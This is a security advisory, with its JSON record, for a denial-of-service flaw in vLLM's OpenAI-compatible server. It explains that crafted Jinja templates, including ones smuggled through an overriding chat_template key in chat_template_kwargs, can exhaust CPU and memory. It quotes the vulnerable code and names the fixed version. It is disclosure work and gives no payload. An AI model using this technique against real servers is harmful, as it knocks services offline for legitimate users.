github - ghsa-6fvq-23cw-5628

GHSA-6FVQ-23CW-5628

Vulnerability from github – Published: 2025-10-07 21:35 – Updated: 2025-10-07 21:35

Summary

vLLM: Resource-Exhaustion (DoS) through Malicious Jinja Template in OpenAI-Compatible Server

Details

Summary

A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the chat_template and chat_template_kwargs parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.

Details

When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In hf/transformer, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a chat_template parameter that lets users specify that template. In addition, the server accepts a chat_template_kwargs parameter to pass extra keyword arguments to the rendering function.

Because Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.

Importantly, simply forbidding the chat_template parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for apply_hf_chat_template and then updates that dictionary with the user-supplied chat_template_kwargs via dict.update. Since dict.update can overwrite existing keys, an attacker can place a chat_template key inside chat_template_kwargs to replace the template that will be used by apply_hf_chat_template.

# vllm/entrypoints/openai/serving_engine.py#L794-L816
_chat_template_kwargs: dict[str, Any] = dict(
    chat_template=chat_template,
    add_generation_prompt=add_generation_prompt,
    continue_final_message=continue_final_message,
    tools=tool_dicts,
    documents=documents,
)
_chat_template_kwargs.update(chat_template_kwargs or {})

request_prompt: Union[str, list[int]]
if isinstance(tokenizer, MistralTokenizer):
    ...
else:
    request_prompt = apply_hf_chat_template(
        tokenizer=tokenizer,
        conversation=conversation,
        model_config=model_config,
        **_chat_template_kwargs,
    )

Impact

If an OpenAI-Compatible Server exposes endpoints that accept chat_template or chat_template_kwargs from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding chat_template inside chat_template_kwargs) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.

Fixes

https://github.com/vllm-project/vllm/pull/25794

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.5.1"
            },
            {
              "fixed": "0.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-07T21:35:22Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the `chat_template` and `chat_template_kwargs` parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.\n\n### Details\n\nWhen using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In `hf/transformer`, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a `chat_template` parameter that lets users specify that template. In addition, the server accepts a `chat_template_kwargs` parameter to pass extra keyword arguments to the rendering function.\n\nBecause Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.\n\nImportantly, simply forbidding the `chat_template` parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for `apply_hf_chat_template` and then updates that dictionary with the user-supplied `chat_template_kwargs` via `dict.update`. Since `dict.update` can overwrite existing keys, an attacker can place a `chat_template` key inside `chat_template_kwargs` to replace the template that will be used by `apply_hf_chat_template`.\n\n\n```python\n# vllm/entrypoints/openai/serving_engine.py#L794-L816\n_chat_template_kwargs: dict[str, Any] = dict(\n    chat_template=chat_template,\n    add_generation_prompt=add_generation_prompt,\n    continue_final_message=continue_final_message,\n    tools=tool_dicts,\n    documents=documents,\n)\n_chat_template_kwargs.update(chat_template_kwargs or {})\n\nrequest_prompt: Union[str, list[int]]\nif isinstance(tokenizer, MistralTokenizer):\n    ...\nelse:\n    request_prompt = apply_hf_chat_template(\n        tokenizer=tokenizer,\n        conversation=conversation,\n        model_config=model_config,\n        **_chat_template_kwargs,\n    )\n```\n\n### Impact\n\nIf an OpenAI-Compatible Server exposes endpoints that accept `chat_template` or `chat_template_kwargs` from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding `chat_template` inside `chat_template_kwargs`) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/25794",
  "id": "GHSA-6fvq-23cw-5628",
  "modified": "2025-10-07T21:35:23Z",
  "published": "2025-10-07T21:35:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6fvq-23cw-5628"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/25794"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/commit/7977e5027c2250a4abc1f474c5619c40b4e5682f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM: Resource-Exhaustion (DoS) through Malicious Jinja Template in OpenAI-Compatible Server"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-6FVQ-23CW-5628

Summary

Details

Impact

Fixes

Tags

Sightings

Nomenclature